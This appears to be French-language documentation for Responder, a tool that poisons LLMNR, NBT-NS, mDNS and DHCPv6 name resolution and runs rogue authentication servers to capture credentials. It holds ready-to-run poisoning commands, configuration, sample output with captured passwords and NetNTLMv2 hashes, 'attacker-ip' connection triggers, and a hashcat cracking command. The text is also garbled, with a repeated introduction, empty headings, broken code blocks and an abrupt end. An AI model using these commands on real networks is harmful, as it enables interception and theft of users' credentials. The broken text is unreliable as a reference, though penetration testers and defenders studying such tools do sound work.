
Responder est un empoisonneur LLMNR, NBT-NS et MDNS, avec un serveur d'authentification frauduleux intégré HTTP/SMB/MSSQL/FTP/LDAP prenant en charge NTLMv1/NTLMv2/LMv2, la sécurité étendue NTLMSSP et l'authentification HTTP basique.
Responder est un empoisonneur LLMNR, NBT-NS et MDNS avec des serveurs d'authentification malveillants intégrés pour HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS, etc. Il prend en charge NTLMv1/NTLMv2/LMv2, la sécurité étendue NTLMSSP, et diverses méthodes d'authentification à travers plus de 15 protocoles.
Responder capture les identifiants en répondant aux requêtes de résolution de noms LLMNR, NBT-NS et MDNS. Lorsqu'un client tente de résoudre un nom d'hôte inexistant, Responder répond en dirigeant le client vers la machine de l'attaquant où plusieurs serveurs d'authentification malveillants capturent les identifiants. Les serveurs malveillants DHCP et DHCPv6 sont également inclus et peuvent être activés séparément.
Données capturées :
Cette version inclut :
sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces
### Installer Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt
sudo python3 Responder.py --help
---
## Démarrage rapide
### Empoisonnement de base```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v
# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v
sudo python3 Responder.py -I eth0 --dhcpv6 -v
### Forcer l'authentification HTTP Basic```bash
sudo python3 Responder.py -I eth0 -b -v
sudo python3 Responder.py -I eth0 -Pvd
---
## Empoisonnement réseau
### Empoisonnement LLMNR/NBT-NS/MDNS
**Objectif :** Répondre aux échecs de résolution de noms
**Fonctionnement :**
1. Le client diffuse une requête pour un hôte inexistant
2. L'attaquant répond : « Je suis cet hôte »
3. Le client se connecte à l'attaquant
4. Les identifiants sont capturés
**Configuration :**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On
Utilisation:```bash sudo python3 Responder.py -I eth0 -v
---
### Serveur DHCPv6
**Objectif :** Forcer les clients à utiliser le DNS de l'attaquant via IPv6
**Fonctionnalités :**
- ✅ Prise en charge d'INFORMATION-REQUEST (Windows 10/11)
- ✅ Prise en charge de SOLICIT/REQUEST
- ✅ Filtrage de domaine (ciblage chirurgical)
- ✅ Annonce de routeur (optionnelle)
**Comment ça fonctionne :**
1. Windows envoie DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST
2. Le répondeur répond : DNS = IPv6 de l'attaquant
3. Windows donne la priorité au DNS IPv6
4. Toutes les requêtes DNS → attaquant
5. Empoisonnement DNS → capture d'identifiants
**Configuration :**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local
; Send Router Advertisements
SendRA = Off
; IPv6 address to advertise
BindToIPv6 = fe80::1
Utilisation :```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v
**Sortie attendue:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123
Responder comprend 17+ serveurs d'authentification rogue :
Objectif : Capture les hashs NetNTLM à partir de partages de fichiers
Fonctionnalités :
Déclencheurs :```powershell
\attacker-ip\share \non-existent-server\files
net use \attacker-ip\share
\attacker-ip\
**Format capturé :**```
username::domain:challenge:response:blob
Craquage :```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt
**Configuration:**```ini
[Responder Core]
SMB = On
Objectif : Capture des identifiants FTP en clair
Fonctionnalités :
Déclencheurs :```bash ftp attacker-ip
**Format capturé :**```
[FTP] Cleartext: username:password
Configuration:```ini [Responder Core] FTP = On
---
### Serveurs de bases de données
#### Serveur MSSQL (Port 1433)
**Objectif:** Capturer l'authentification Microsoft SQL Server
**Fonctionnalités:**
- ✅ Authentification SQL Server
- ✅ Authentification Windows (NTLM)
- ✅ Identifiants SQL en clair
- ✅ Capture de hash NetNTLMv2
**Déclencheurs:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows
-- Command line
sqlcmd -S attacker-ip -U sa -P password
-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;
Formats capturés:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob
**Configuration:**```ini
[Responder Core]
SQL = On
Remarques :
Objectif : Capturer l'authentification des clients de messagerie
Fonctionnalités :